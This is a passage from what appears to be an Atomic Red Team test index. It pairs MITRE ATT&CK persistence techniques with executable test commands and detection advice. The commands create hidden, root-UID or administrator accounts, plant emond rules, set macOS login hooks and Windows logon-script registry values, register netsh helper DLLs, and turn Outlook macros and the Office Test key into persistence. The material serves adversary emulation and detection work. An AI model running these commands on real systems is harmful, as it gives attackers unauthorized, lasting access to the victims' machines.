macOS - Event Monitor Daemon. \n" - supported_platforms: - - macos - input_arguments: - script_location: - description: evil plist location - type: path - default: "$PathToAtomicsFolder/T1053.004/src/atomicredteam_T1053_004.plist" - script_destination: - description: Path where to move the evil plist - type: path - default: "/etc/emond.d/rules/atomicredteam_T1053_004.plist" - empty_file: - description: Random name of the empty file used to trigger emond service - type: string - default: randomflag - executor: - name: bash - elevation_required: true - command: | - sudo cp #{script_location} #{script_destination} - sudo touch /private/var/db/emondClients/#{empty_file} - cleanup_command: | - sudo rm #{script_destination} - sudo rm /private/var/db/emondClients/#{empty_file} - T1136.001: - technique: - external_references: - - source_name: mitre-attack - external_id: T1136.001 - url: https://attack.mitre.org/techniques/T1136/001 - - source_name: Microsoft User Creation Event - description: 'Lich, B., Miroshnikov, A. (2017, April 5). 4720(S): A user account - was created. Retrieved June 30, 2017.' - url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4720 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Local Account - description: |- - Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service. With a sufficient level of access, the net user /add command can be used to create a local account. - - Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system. - id: attack-pattern--635cbe30-392d-4e27-978e-66774357c762 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-23T18:04:20.780Z' - created: '2020-01-28T13:50:22.506Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - x_mitre_detection: 'Monitor for processes and command-line parameters associated - with local account creation, such as net user /add or useradd. - Collect data on account creation within a network. Event ID 4720 is generated - when a user account is created on a Windows system. (Citation: Microsoft User - Creation Event) Perform regular audits of local system accounts to detect - suspicious accounts that may have been created by an adversary.' - x_mitre_data_sources: - - Process monitoring - - Process command-line parameters - - Authentication logs - - Windows event logs - x_mitre_platforms: - - Linux - - macOS - - Windows - identifier: T1136.001 - atomic_tests: - - name: Create a user account on a Linux system - auto_generated_guid: 40d8eabd-e394-46f6-8785-b9bfa1d011d2 - description: 'Create a user via useradd - -' - supported_platforms: - - linux - input_arguments: - username: - description: Username of the user to create - type: String - default: evil_user - executor: - command: 'useradd -M -N -r -s /bin/bash -c evil_account #{username} - -' - cleanup_command: 'userdel #{username} - -' - name: bash - elevation_required: true - - name: Create a user account on a MacOS system - auto_generated_guid: '01993ba5-1da3-4e15-a719-b690d4f0f0b2' - description: 'Creates a user on a MacOS system with dscl - -' - supported_platforms: - - macos - input_arguments: - username: - description: Username of the user to create - type: String - default: evil_user - realname: - description: "'realname' to record when creating the user" - type: String - default: Evil Account - executor: - command: | - dscl . -create /Users/#{username} - dscl . -create /Users/#{username} UserShell /bin/zsh - dscl . -create /Users/#{username} RealName "#{realname}" - dscl . -create /Users/#{username} UniqueID "1010" - dscl . -create /Users/#{username} PrimaryGroupID 80 - dscl . -create /Users/#{username} NFSHomeDirectory /Users/#{username} - cleanup_command: 'dscl . -delete /Users/#{username} - -' - name: bash - elevation_required: true - - name: Create a new user in a command prompt - auto_generated_guid: 6657864e-0323-4206-9344-ac9cd7265a4f - description: | - Creates a new user in a command prompt. Upon execution, "The command completed successfully." will be displayed. To verify the - new account, run "net user" in powershell or CMD and observe that there is a new user named "T1136.001_CMD" - supported_platforms: - - windows - input_arguments: - username: - description: Username of the user to create - type: String - default: T1136.001_CMD - password: - description: Password of the user to create - type: String - default: T1136.001_CMD! - executor: - command: 'net user /add "#{username}" "#{password}" - -' - cleanup_command: 'net user /del "#{username}" >nul 2>&1 - -' - name: command_prompt - elevation_required: true - - name: Create a new user in PowerShell - auto_generated_guid: bc8be0ac-475c-4fbf-9b1d-9fffd77afbde - description: | - Creates a new user in PowerShell. Upon execution, details about the new account will be displayed in the powershell session. To verify the - new account, run "net user" in powershell or CMD and observe that there is a new user named "T1136.001_PowerShell" - supported_platforms: - - windows - input_arguments: - username: - description: Username of the user to create - type: String - default: T1136.001_PowerShell - executor: - command: 'New-LocalUser -Name "#{username}" -NoPassword - -' - cleanup_command: 'Remove-LocalUser -Name "#{username}" -ErrorAction Ignore - -' - name: powershell - elevation_required: true - - name: Create a new user in Linux with `root` UID and GID. - auto_generated_guid: a1040a30-d28b-4eda-bd99-bb2861a4616c - description: 'Creates a new user in Linux and adds the user to the `root` group. - This technique was used by adversaries during the Butter attack campaign. - -' - supported_platforms: - - linux - input_arguments: - username: - description: Username of the user to create - type: String - default: butter - password: - description: Password of the user to create - type: String - default: BetterWithButter - executor: - command: | - useradd -g 0 -M -d /root -s /bin/bash #{username} - if [ $(cat /etc/os-release | grep -i 'Name="ubuntu"') ]; then echo "#{username}:#{password}" | sudo chpasswd; else echo "#{password}" | passwd --stdin #{username}; fi; - cleanup_command: 'userdel #{username} - -' - name: bash - elevation_required: true - - name: Create a new Windows admin user - auto_generated_guid: fda74566-a604-4581-a4cc-fbbe21d66559 - description: 'Creates a new admin user in a command prompt. - -' - supported_platforms: - - windows - input_arguments: - username: - description: Username of the user to create - type: String - default: T1136.001_Admin - password: - description: Password of the user to create - type: String - default: T1136_pass - executor: - command: | - net user /add "#{username}" "#{password}" - net localgroup administrators "#{username}" /add - cleanup_command: 'net user /del "#{username}" >nul 2>&1 - -' - name: command_prompt - elevation_required: true - T1078.003: - technique: - external_references: - - source_name: mitre-attack - external_id: T1078.003 - url: https://attack.mitre.org/techniques/T1078/003 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Local Accounts - description: "Adversaries may obtain and abuse credentials of a local account - as a means of gaining Initial Access, Persistence, Privilege Escalation, or - Defense Evasion. Local accounts are those configured by an organization for - use by users, remote support, services, or for administration on a single - system or service.\n\nLocal Accounts may also be abused to elevate privileges - and harvest credentials through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). - Password reuse may allow the abuse of local accounts across a set of machines - on a network for the purposes of Privilege Escalation and Lateral Movement. " - id: attack-pattern--fdc47f44-dd32-4b99-af5f-209f556f63c2 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: initial-access - modified: '2020-03-23T21:48:41.083Z' - created: '2020-03-13T20:26:46.695Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - - User - x_mitre_detection: Perform regular audits of local system accounts to detect - accounts that may have been created by an adversary for persistence. Look - for suspicious account behavior, such as accounts logged in at odd times or - outside of business hours. - x_mitre_data_sources: - - Authentication logs - x_mitre_platforms: - - Linux - - macOS - - Windows - identifier: T1078.003 - atomic_tests: - - name: Create local account with admin priviliges - auto_generated_guid: a524ce99-86de-4db6-b4f9-e08f35a47a15 - description: After execution the new account will be active and added to the - Administrators group - supported_platforms: - - windows - executor: - command: |- - net user art-test /add - net user art-test Password123! - net localgroup administrators art-test /add - cleanup_command: |- - net localgroup administrators art-test /delete >nul 2>&1 - net user art-test /delete >nul 2>&1 - name: command_prompt - elevation_required: true - T1037.002: - technique: - external_references: - - source_name: mitre-attack - external_id: T1037.002 - url: https://attack.mitre.org/techniques/T1037/002 - - url: https://support.apple.com/de-at/HT2420 - description: 'Apple. (2011, June 1). Mac OS X: Creating a login hook. Retrieved - July 17, 2017.' - source_name: creating login hook - - source_name: S1 macOs Persistence - url: https://www.sentinelone.com/blog/how-malware-persists-on-macos/ - description: Stokes, P. (2019, July 17). How Malware Persists on macOS. Retrieved - March 27, 2020. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Logon Script (Mac) - description: "Adversaries may use macOS logon scripts automatically executed - at logon initialization to establish persistence. macOS allows logon scripts - (known as login hooks) to be executed whenever a specific user logs into a - system. A login hook tells Mac OS X to execute a certain script when a user - logs in, but unlike [Startup Items](https://attack.mitre.org/techniques/T1037/005), - a login hook executes as the elevated root user.(Citation: creating login - hook)\n\nAdversaries may use these login hooks to maintain persistence on - a single system.(Citation: S1 macOs Persistence) Access to login hook scripts - may allow an adversary to insert additional malicious code. There can only - be one login hook at a time though and depending on the access configuration - of the hooks, either local credentials or an administrator account may be - necessary. " - id: attack-pattern--43ba2b05-cf72-4b6c-8243-03a4aba41ee0 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-27T16:49:15.786Z' - created: '2020-01-10T16:01:15.995Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_detection: Monitor logon scripts for unusual access by abnormal users - or at abnormal times. Look for files added or modified by unusual accounts - outside of normal administration duties. Monitor running process for actions - that could be indicative of abnormal programs or executables running upon - logon. - x_mitre_data_sources: - - Process monitoring - - File monitoring - x_mitre_platforms: - - macOS - identifier: T1037.002 - atomic_tests: - - name: Logon Scripts - Mac - auto_generated_guid: f047c7de-a2d9-406e-a62b-12a09d9516f4 - description: 'Mac logon script - -' - supported_platforms: - - macos - executor: - steps: "1. Create the required plist file\n\n sudo touch /private/var/root/Library/Preferences/com.apple.loginwindow.plist\n\n2. - Populate the plist with the location of your shell script\n\n sudo defaults - write com.apple.loginwindow LoginHook /Library/Scripts/AtomicRedTeam.sh\n\n3. - Create the required plist file in the target user's Preferences directory\n\n\t - \ touch /Users/$USER/Library/Preferences/com.apple.loginwindow.plist\n\n4. - Populate the plist with the location of your shell script\n\n\t defaults - write com.apple.loginwindow LoginHook /Library/Scripts/AtomicRedTeam.sh\n" - name: manual - T1037.001: - technique: - id: attack-pattern--eb125d40-0b2d-41ac-a71a-3229241c2cd3 - description: "Adversaries may use Windows logon scripts automatically executed - at logon initialization to establish persistence. Windows allows logon scripts - to be run whenever a specific user or group of users log into a system.(Citation: - TechNet Logon Scripts) This is done via adding a path to a script to the HKCU\\Environment\\UserInitMprLogonScript - Registry key.(Citation: Hexacorn Logon Scripts)\n\nAdversaries may use these - scripts to maintain persistence on a single system. Depending on the access - configuration of the logon scripts, either local credentials or an administrator - account may be necessary. " - name: Logon Script (Windows) - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1037.001 - url: https://attack.mitre.org/techniques/T1037/001 - - url: https://technet.microsoft.com/en-us/library/cc758918(v=ws.10).aspx - description: Microsoft. (2005, January 21). Creating logon scripts. Retrieved - April 27, 2016. - source_name: TechNet Logon Scripts - - source_name: Hexacorn Logon Scripts - url: http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/ - description: Hexacorn. (2014, November 14). Beyond good ol’ Run key, Part - 18. Retrieved November 15, 2019. - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-24T23:45:03.153Z' - created: '2020-01-10T03:43:37.211Z' - x_mitre_platforms: - - Windows - x_mitre_data_sources: - - Process monitoring - - Windows Registry - x_mitre_detection: |- - Monitor for changes to Registry values associated with Windows logon scrips, nameley HKCU\Environment\UserInitMprLogonScript. - - Monitor running process for actions that could be indicative of abnormal programs or executables running upon logon. - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - identifier: T1037.001 - atomic_tests: - - name: Logon Scripts - auto_generated_guid: d6042746-07d4-4c92-9ad8-e644c114a231 - description: | - Adds a registry value to run batch script created in the %temp% directory. Upon execution, there will be a new environment variable in the HKCU\Environment key - that can be viewed in the Registry Editor. - supported_platforms: - - windows - input_arguments: - script_path: - description: Path to .bat file - type: String - default: "%temp%\\art.bat" - script_command: - description: Command To Execute - type: String - default: echo Art "Logon Script" atomic test was successful. >> %USERPROFILE%\desktop\T1037.001-log.txt - executor: - command: | - echo "#{script_command}" > #{script_path} - REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_SZ /d "#{script_path}" /f - cleanup_command: | - REG.exe DELETE HKCU\Environment /v UserInitMprLogonScript /f >nul 2>&1 - del #{script_path} >nul 2>&1 - del "%USERPROFILE%\desktop\T1037.001-log.txt" >nul 2>&1 - name: command_prompt - T1546.007: - technique: - external_references: - - source_name: mitre-attack - external_id: T1546.007 - url: https://attack.mitre.org/techniques/T1546/007 - - url: https://technet.microsoft.com/library/bb490939.aspx - description: Microsoft. (n.d.). Using Netsh. Retrieved February 13, 2017. - source_name: TechNet Netsh - - url: https://github.com/outflankbv/NetshHelperBeacon - description: Smeets, M. (2016, September 26). NetshHelperBeacon. Retrieved - February 13, 2017. - source_name: Github Netsh Helper CS Beacon - - url: https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshell.html - description: Demaske, M. (2016, September 23). USING NETSHELL TO EXECUTE EVIL - DLLS AND PERSIST ON A HOST. Retrieved April 8, 2017. - source_name: Demaske Netsh Persistence - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Netsh Helper DLL - description: |- - Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility. (Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\SOFTWARE\Microsoft\Netsh. - - Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality. (Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence) - id: attack-pattern--f63fe421-b1d1-45c0-b8a7-02cd16ff2bed - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-24T18:28:07.793Z' - created: '2020-01-24T14:26:51.207Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - - SYSTEM - x_mitre_detection: 'It is likely unusual for netsh.exe to have any child processes - in most environments. Monitor process executions and investigate any child - processes spawned by netsh.exe for malicious behavior. Monitor the HKLM\SOFTWARE\Microsoft\Netsh - registry key for any new or suspicious entries that do not correlate with - known system files or benign software. (Citation: Demaske Netsh Persistence)' - x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - Windows Registry - - DLL monitoring - x_mitre_contributors: - - Matthew Demaske, Adaptforward - x_mitre_platforms: - - Windows - identifier: T1546.007 - atomic_tests: - - name: Netsh Helper DLL Registration - auto_generated_guid: 3244697d-5a3a-4dfc-941c-550f69f91a4d - description: 'Netsh interacts with other operating system components using dynamic-link - library (DLL) files - -' - supported_platforms: - - windows - input_arguments: - helper_file: - description: Path to DLL - type: Path - default: C:\Path\file.dll - executor: - command: 'netsh.exe add helper #{helper_file} - -' - name: command_prompt - T1037.003: - technique: - external_references: - - source_name: mitre-attack - external_id: T1037.003 - url: https://attack.mitre.org/techniques/T1037/003 - - source_name: Petri Logon Script AD - url: https://www.petri.com/setting-up-logon-script-through-active-directory-users-computers-windows-server-2008 - description: Daniel Petri. (2009, January 8). Setting up a Logon Script through - Active Directory Users and Computers in Windows Server 2008. Retrieved November - 15, 2019. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Network Logon Script - description: "Adversaries may use network logon scripts automatically executed - at logon initialization to establish persistence. Network logon scripts can - be assigned using Active Directory or Group Policy Objects.(Citation: Petri - Logon Script AD) These logon scripts run with the privileges of the user they - are assigned to. Depending on the systems within the network, initializing - one of these scripts could apply to more than one or potentially all systems. - \ \n \nAdversaries may use these scripts to maintain persistence on a network. - Depending on the access configuration of the logon scripts, either local credentials - or an administrator account may be necessary." - id: attack-pattern--c63a348e-ffc2-486a-b9d9-d7f11ec54d99 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-03-24T23:45:25.625Z' - created: '2020-01-10T18:01:03.666Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_detection: Monitor logon scripts for unusual access by abnormal users - or at abnormal times. Look for files added or modified by unusual accounts - outside of normal administration duties. Monitor running process for actions - that could be indicative of abnormal programs or executables running upon - logon. - x_mitre_data_sources: - - Process monitoring - - File monitoring - x_mitre_platforms: - - Windows - atomic_tests: [] - T1137: - technique: - created: '2017-12-14T16:46:06.044Z' - modified: '2020-06-25T17:48:09.417Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - type: attack-pattern - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1137 - url: https://attack.mitre.org/techniques/T1137 - - source_name: SensePost Ruler GitHub - url: https://github.com/sensepost/ruler - description: 'SensePost. (2016, August 18). Ruler: A tool to abuse Exchange - services. Retrieved February 4, 2019.' - - source_name: TechNet O365 Outlook Rules - url: https://blogs.technet.microsoft.com/office365security/defending-against-rules-and-forms-injection/ - description: Koeller, B.. (2018, February 21). Defending Against Rules and - Forms Injection. Retrieved November 5, 2019. - - source_name: CrowdStrike Outlook Forms - url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746 - description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral - Movement and Persistence. Retrieved February 5, 2019. - - source_name: Outlook Today Home Page - url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943 - description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence. - Retrieved February 5, 2019. - - source_name: Microsoft Detect Outlook Forms - url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack - description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook - Rules and Custom Forms Injections Attacks in Office 365. Retrieved February - 4, 2019. - - source_name: SensePost NotRuler - url: https://github.com/sensepost/notruler - description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler, - provides blue teams with the ability to detect Ruler usage against Exchange. - Retrieved February 4, 2019. - description: |- - Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins. - - A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules) - name: Office Application Startup - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - id: attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53 - x_mitre_is_subtechnique: false - x_mitre_version: '1.2' - x_mitre_contributors: - - Nick Carr, FireEye - - Microsoft Threat Intelligence Center (MSTIC) - - Sahar Shukrun - - Praetorian - - Loic Jaquemet - - Ricardo Dias - x_mitre_data_sources: - - Mail server - - Process monitoring - - Process command-line parameters - - Windows Registry - - File monitoring - x_mitre_detection: |- - Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously. - - Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page) - - Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler) - x_mitre_permissions_required: - - User - - Administrator - x_mitre_platforms: - - Windows - - Office 365 - identifier: T1137 - atomic_tests: - - name: Office Application Startup - Outlook as a C2 - auto_generated_guid: bfe6ac15-c50b-4c4f-a186-0fc6b8ba936c - description: "As outlined in MDSEC's Blog post https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/ - \nit is possible to use Outlook Macro as a way to achieve persistance and - execute arbitrary commands. This transform Outlook into a C2.\nToo achieve - this two things must happened on the syste\n- The macro security registry - value must be set to '4'\n- A file called VbaProject.OTM must be created in - the Outlook Folder.\n" - supported_platforms: - - windows - executor: - command: | - reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /t REG_DWORD /d 4 - if not exist %APPDATA%\Microsoft\Outlook ( md %APPDATA%\Microsoft\Outlook\ ) - echo "Atomic Red Team TEST" > %APPDATA%\Microsoft\Outlook\VbaProject.OTM - cleanup_command: | - reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /f - del %APPDATA%\Microsoft\Outlook\VbaProject.OTM - name: command_prompt - T1137.001: - technique: - external_references: - - source_name: mitre-attack - external_id: T1137.001 - url: https://attack.mitre.org/techniques/T1137/001 - - url: https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea - description: Microsoft. (n.d.). Change the Normal template (Normal.dotm). - Retrieved July 3, 2017. - source_name: Microsoft Change Normal Template - - url: https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office - description: Austin, J. (2017, June 6). Getting Started with VBA in Office. - Retrieved July 3, 2017. - source_name: MSDN VBA in Office - - url: https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/ - description: Nelson, M. (2014, January 23). Maintaining Access with normal.dotm. - Retrieved July 3, 2017. - source_name: enigma0x3 normal.dotm - - url: http://www.hexacorn.com/blog/2017/04/19/beyond-good-ol-run-key-part-62/ - description: Hexacorn. (2017, April 17). Beyond good ol’ Run key, Part 62. - Retrieved July 3, 2017. - source_name: Hexacorn Office Template Macros - - source_name: GlobalDotName Jun 2019 - url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique - description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName - - A Stealthy Office Persistence Technique. Retrieved August 26, 2019. - - source_name: CrowdStrike Outlook Forms - url: https://malware.news/t/using-outlook-forms-for-lateral-movement-and-persistence/13746 - description: Parisi, T., et al. (2017, July). Using Outlook Forms for Lateral - Movement and Persistence. Retrieved February 5, 2019. - - source_name: Outlook Today Home Page - url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943 - description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence. - Retrieved February 5, 2019. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Office Template Macros - description: "Adversaries may abuse Microsoft Office templates to obtain persistence - on a compromised system. Microsoft Office contains templates that are part - of common Office applications and are used to customize styles. The base templates - within the application are used each time an application starts. (Citation: - Microsoft Change Normal Template)\n\nOffice Visual Basic for Applications - (VBA) macros (Citation: MSDN VBA in Office) can be inserted into the base - template and used to execute code when the respective Office application starts - in order to obtain persistence. Examples for both Word and Excel have been - discovered and published. By default, Word has a Normal.dotm template created - that can be modified to include a malicious macro. Excel does not have a template - file created by default, but one can be added that will automatically be loaded.(Citation: - enigma0x3 normal.dotm)(Citation: Hexacorn Office Template Macros) Shared templates - may also be stored and pulled from remote locations.(Citation: GlobalDotName - Jun 2019) \n\nWord Normal.dotm location:
\nC:\\Users\\<username>\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm\n\nExcel - Personal.xlsb location:
\nC:\\Users\\<username>\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\PERSONAL.XLSB\n\nAdversaries - may also change the location of the base template to point to their own by - hijacking the application's search order, e.g. Word 2016 will first look for - Normal.dotm under C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\, - or by modifying the GlobalDotName registry key. By modifying the GlobalDotName - registry key an adversary can specify an arbitrary location, file name, and - file extension to use for the template that will be loaded on application - startup. To abuse GlobalDotName, adversaries may first need to register the - template as a trusted document or place it in a trusted location.(Citation: - GlobalDotName Jun 2019) \n\nAn adversary may need to enable macros to execute - unrestricted depending on the system or enterprise security policy on use - of macros." - id: attack-pattern--79a47ad0-fc3b-4821-9f01-a026b1ddba21 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-06-25T17:48:08.916Z' - created: '2019-11-07T20:29:17.788Z' - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - x_mitre_permissions_required: - - User - - Administrator - x_mitre_detection: 'Many Office-related persistence mechanisms require changes - to the Registry and for binaries, files, or scripts to be written to disk - or existing files modified to include malicious scripts. Collect events related - to Registry key creation and modification for keys that could be used for - Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook - Today Home Page) Modification to base templates, like Normal.dotm, should - also be investigated since the base templates should likely not contain VBA - macros. Changes to the Office macro security settings should also be investigated.(Citation: - GlobalDotName Jun 2019)' - x_mitre_data_sources: - - Windows Registry - - Process monitoring - - Process command-line parameters - - File monitoring - x_mitre_platforms: - - Windows - - Office 365 - atomic_tests: [] - T1137.002: - technique: - external_references: - - source_name: mitre-attack - external_id: T1137.002 - url: https://attack.mitre.org/techniques/T1137/002 - - url: http://www.hexacorn.com/blog/2014/04/16/beyond-good-ol-run-key-part-10/ - description: Hexacorn. (2014, April 16). Beyond good ol’ Run key, Part 10. - Retrieved July 3, 2017. - source_name: Hexacorn Office Test - - url: https://researchcenter.paloaltonetworks.com/2016/07/unit42-technical-walkthrough-office-test-persistence-method-used-in-recent-sofacy-attacks/ - description: 'Falcone, R. (2016, July 20). Technical Walkthrough: Office Test - Persistence Method Used In Recent Sofacy Attacks. Retrieved July 3, 2017.' - source_name: Palo Alto Office Test Sofacy - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Office Test - description: |- - Adversaries may abuse the Microsoft Office "Office Test" Registry key to obtain persistence on a compromised system. An Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. This Registry key is thought to be used by Microsoft to load DLLs for testing and debugging purposes while developing Office applications. This Registry key is not created by default during an Office installation.(Citation: Hexacorn Office Test)(Citation: Palo Alto Office Test Sofacy) - - There exist user and global Registry keys for the Office Test feature: - - * HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf - * HKEY_LOCAL_MACHINE\Software\Microsoft\Office test\Special\Perf - - Adversaries may add this Registry key and specify a malicious DLL that will be executed whenever an Office application, such as Word or Excel, is started. - id: attack-pattern--ed7efd4d-ce28-4a19-a8e6-c58011eb2c7a - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-20T15:27:51.559Z' - created: '2019-11-07T19:44:04.475Z' - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - x_mitre_system_requirements: - - Office 2007, 2010, 2013, and 2016 - x_mitre_permissions_required: - - Administrator - - User - x_mitre_detection: |- - Monitor for the creation of the Office Test Registry key. Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence. Since v13.52, Autoruns can detect tasks set up using the Office Test Registry key.(Citation: Palo Alto Office Test Sofacy) - - Consider monitoring Office processes for anomalous DLL loads. - x_mitre_data_sources: - - DLL monitoring - - Loaded DLLs - - Process monitoring - - Process command-line parameters - - File monitoring - - Windows Registry - x_mitre_platforms: - - Windows - - Office 365 - identifier: T1137.002 - atomic_tests: - - name: Office Application Startup Test Persistence - auto_generated_guid: c3e35b58-fe1c-480b-b540-7600fb612563 - description: | - Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office - application is started. Key is used for debugging purposes. Not created by default & exist in HKCU & HKLM hives. - supported_platforms: - - windows - input_arguments: - thing_to_execute: - description: Thing to Run - type: Path - default: C:\Path\AtomicRedTeam.dll - executor: - command: 'reg add "HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf" - /t REG_SZ /d "#{thing_to_execute}" - -' - cleanup_command: 'reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office - test\Special\Perf" - -' - name: command_prompt - T1137.003: - technique: - external_references: - - source_name: mitre-attack - external_id: T1137.003 - url: https://attack.mitre.org/techniques/T1137/003 - - source_name: SensePost Outlook Forms - url: https://sensepost.com/blog/2017/outlook-forms-and-shells/ - description: Stalmans, E. (2017, April 28). Outlook Forms and Shells. Retrieved - February 4, 2019. - - source_name: Microsoft Detect Outlook Forms - url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack - description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook - Rules and Custom Forms Injections Attacks in Office 365. 